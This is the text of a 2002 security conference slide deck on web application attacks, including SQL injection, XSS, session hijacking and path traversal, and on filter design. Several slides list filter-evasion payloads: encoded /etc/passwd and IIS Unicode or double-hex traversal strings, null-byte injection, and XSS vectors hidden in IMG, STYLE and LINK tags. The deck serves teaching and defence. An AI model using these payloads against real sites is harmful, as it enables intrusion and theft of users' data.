Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Taking Aim at Web Applications Dennis Groves Bill Pennington
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Introduction Bill Pennington Principal Consultant, Guardent Tested over 300 web applications of the past 3 years 2
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Dennis Groves Specialty: Enterprise Security, Web Application Security, Pen. Testing & Quality Assurance. Bio: Dennis is currently the Director of Internet Security Consulting for Centerstance, Inc. For the last 3 years his primary focus has been on Web Application Security. He is a founding member of the Open Web Application Project and a former Sanctum employee, he played a key role in the development of App. Scan. 3
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Why is this important? 4
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Topics This is not new Why your firewall doesn’t matter Types of attacks Filter, Filter Do you know where your data is? Tools to help you 5
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman This is Not New Problems with web applications are the same problems with standalone applications 6
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Why your Firewall doesn’t matter Standard rant 7
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Top 5 Vulnerabilities SQL insertion XSS Session Hijacking Parameter manipulation Unbounded file calls 8
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Cross site scripting, Why you should care. XSS is not an attack on the server, it is an attack on the users of your application So what? Identity theft User masquerading Reputation Risk 9
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman SQL Insertion Most common on MS based applications. All SQL apps are vulnerable (Oracle, Sybase, DB 2…) Can lead to full compromise of the server (xp_cmdshell) Almost guarantied to lead to data compromise Demo… 10
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Cross Site Scripting (XSS) Found in 98% of applications I test 2 main types Transient (URL based. P http: //badapp. com/error. jsp? msg=<SCRIPT>alert("Test"); </SCRIPT> Sticky – Script placed in a static bit of web content 11
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman XSS continued… Transient generally requires user interaction What can happen? Possibilities are only restricted by the client Cookie theft most common example But I filter “<“ and “>” Jscript entities “&{alert(‘Test')}; ” 12
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Session Hijacking HTTP is stateless so application designers must build a way to track state Cookies and URL strings are the most common ways to track state Both are easily exploitable 13
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Session Hijacking continued… Generally the next thing to occur after XSS Please people logout means logout! Examples of common session tracking issues 14
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Parameter Tampering Programmers will store data anywhere! URL parameters http: //badapp. com/checkout. pl? p=$1. 00 Cookies – Cookie: p=$1. 00 Hidden fields – not really hidden 15
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Unbound File Calls Ye Ole’. . / Watch out you don’t display important information (global. asa) Most application languages will take URL’s as file arguments 16
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Do you know where your data is? Building an exclusionary filter is difficult because your data is all over the place 17
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Data Flow example 18
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Designing a proper filter Make all filters default deny Don’t try to exclude “bad stuff” Try to get a good idea where your data is going Log all filter violations 19
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Examples ASP PHP Jscript Perl 20
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Bypassing poorly designed filters All warfare is based on deception…If he is in superior strength, evade him. –Sun Tzu, The Art of War, 500 BC
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Evasion is the art of blending in so you will not be noticed; of course this age old technique of survival is still useful today. 1. 2. 3. 4. evade to escape or avoid somebody or something, usually by ingenuity or guile to avoid doing something unpleasant, especially something that is a moral or legal obligation to avoid dealing with or responding directly to something to be difficult or impossible for somebody to find, obtain, or achieve (formal) 22
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Filter Bypassing is a technique to evade detection by filtering systems. Filter Bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system. Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination. 23
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Most filter systems are very simple as the flow chart shows. Evade: 1. to escape or avoid somebody or something, usually by ingenuity or guile… Seven forms of ingenuity: URL Encoded Strings Double Hex Encoding Unicode Encoded String Long URLs Case Sensitivity XSS Filter-Bypass Manipulation Null Character Injection 24
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman The Hex Advantage By URL hex encoding URL strings, it may be possible circumvent filter security systems and IDS. http: //foo. com/cgi? file=/etc/passwd Can become: http: //foo. com/cgi? file=/%2 F%65%74%63 %2 F%70%61%73%73%77%64 25
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Double Hex Encoding In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability. The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL. An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability. When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL. IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding. This secondary decoding was the source of another Vulnerability. 26
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman IIS Double Hex Round 1 Decoding: scripts/. . %255 c. . /winnt becomes: scripts/. . %5 c. . /winnt (%25 = “%” Character) Round 2 Decoding: scripts/. . %5 c. . /winnt becomes: scripts/. . . . /winnt Directory path traversal is now possible using path obfuscation through Double Hex Encoding. 27
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman The Unicode Slash In unicode, “%c 0%af”, is the equivilent to a slash (“/”). Therefore the common URL IIS exploit: scripts/. . %c 0%af. . /winnt becomes: scripts/. . /winnt Once again, directory path traversal is now possible using path obfuscation through Unicode. 28
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Double Slash using multiple directory slashes in URLs. For example: http: //www. foo. com/. . //etc//passwd. Can be used to move under the radar of IDS systems and still function properly. 29
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Long URL’s Many system put limits on how much data a variable can store or a system can handle. Often times if these limits are exceeded, the data will still be used, but bypass certain security considerations. URL’s such as: http: //www. foo. com/cgi? param=filename Replaced with: http: //www. foo. com/cgi? param=<2 K_of_Data> 30
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Case Sensitivity Case sensitivity may play a roll in many security filtration systems. Alternating case on URL parameters may be used to bypass certain restrictions. http: //foo. com/cgi? param=bar http: //foo. com/cgi? param=Ba. R http: //foo. com/CGI? param=BAR 31
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Method Switching Many web applications do not properly perform HTTP Request Method sanity checking. Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms. Most web servers do not log "POST" data and thus forensic analysis is harder to perform. The Request Method: can become: GET /cgi-bin/some. cgi POST /cgi-bin/some. cgi 32
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman HTTP 1. 1 Methods The Method token indicates the method to be performed on the resource identified by the Request-URI. OPTIONS GET HEAD POST PUT DELETE TRACE CONNECT 33
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Using your “HEAD” The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data. Scans and web application attacks can be made to be more effective using this technique. 34
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Null Character Injection Hex encoded null characters can be used to thwart some security mechanisms. This happens because in the “C” programming language, a null character designates the end of a string. So If a CGI appending a “. html” to an input parameter: http: //foo. com/cgi? file=. . /etc/passwd%00 Will cut off appending “. html”. 35
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Unicode (UTF-8) Encoded Unicode is a universal way to represent characters. However, unicode can also be used to circumvent security mechanisms by representing information in another fashion. Microsoft IIS has had security issues in the past while supporting unicode. 36
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman URL Encoded String The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set: ". . . Only alphanumerics [0 -9 a-z. AZ], the special characters "$_. +!*'(), " [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL. " 37
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman XSS Filter-Bypass Manipulation This technique is used pass various types of client-side scripting language through implemented security filters. The idea is to be able to achieve client-side execution of a client-side script. There are several techniques used to perform this attack. 38
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Test the Filters Submit all the raw HTML tags you can find, and then view the output results. Combine HTML with tag attributes, such as SRC, STYLE, HREF and On. XXX (Java. Script Event Handler). This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited. 39
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman SRCing the protocol Using the “javascript” protocol in an HTML source attribute. <IMG SRC="javascript: js_expression"> <IMG SRC="javascript: alert('test'); "> 40
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Alternate Protocol SRCing Same technique as the previous, however, using the protocol “livescript” and “mocha” will yield the same effect. <IMG SRC=“livescript: js_expression"> <IMG SRC=“mocha: alert('test'); "> 41
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Decimal HTML Entities Variation on previous techniques, using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute Java. Script. <IMG SRC=“java script: js_expression"> �9 10 11 12 13 have all been seen to work 42
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Hex HTML Entities Another variation on the previous example, HEX HTML entities may also be used to bypass filter restriction, yet execute Java. Script. <IMG SRC=“java&#X 0 A; script: js_expression"> 43
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Padding HTML Entities Padding HTML entities with “ 0’s” may also be used to bypass the filters, yet still execute Java. Script. <IMG SRC=“java script: js_expression"> 44
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman STYLE Java. Script Type Changing the MIME-TYPE on a “style” tag may be used to execute Java. Script. <style TYPE="text/javascript"> JS EXPRESSION </style> <style TYPE="text/javascript"> Alert(document. domain); </style> 45
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman STYLE Java. Script X-Type Variation on the previous example, but by using the “application/x-javascript” MIMETYPE, the filters may be bypassed. <STYLE TYPE="application/x-javascript"> alert('Java. Script has been Executed'); </STYLE> 46
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman STYLE Java. Script Import Using the @import feature in CSS may be used to perform Java. Script protocol SRCing. <style TYPE="text/css"> @import url(javascript: alert('Javascript is executed')); </style> 47
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman STYLE URL Import Using the @import feature in CSS can also be used to import Java. Script from another HTTP resource. <STYLE type=text/css> @import url(http: //www. test. com); </STYLE> 48
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman LINK Style Sheet The “LINK” tag can be used to import Java. Script from a remote HTTP resource. <LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path. js"> 49
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Style Left Expression A few CSS features used together to execute Java. Script. <P STYLE="left: expression(eval('alert('Java. Script is executed'); window. close()'))" > 50
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Remote SRCing A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME” can be used to src in Java. Script from remote resources. <LAYER SRC="js. html"></LAYER> 51
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman AND CURLY <IMG SRC="&{javascript_expression}; "> <IMG SRC="&{alert(‘alert’)}; "> Syntax must be exact. 52
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Dangerous HTML Tags “All HTML is to be considered dangerous, but these tags are the most insidious. ” <APPLET> <BODY> <EMBED> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE> 53
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Dangerous HTML Attributes (HTML Tags with these attributes. ) SRC LOWSRC STYLE HREF 54
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Why automated tools don’t work very well Every programmer does things a little different Authentication schemes are hard to automate Error codes are not standardized Sometimes simple things like SSL get in the way Some good things: Completeness Large knowledge bases (at least possibly) 55
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Why people are better Recognition of subtle errors We understand the impact and therefore the risk of a vulnerability We can find “real” bugs, flaws in logic 56
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman One tool to rule them all… 57
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Conclusion 58
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman Questions 59
Скачать презентацию Copyright 2002 Dennis Groves Bill Pennington
9e08cf5b1c1f4eeceb48e26ecb74020f.ppt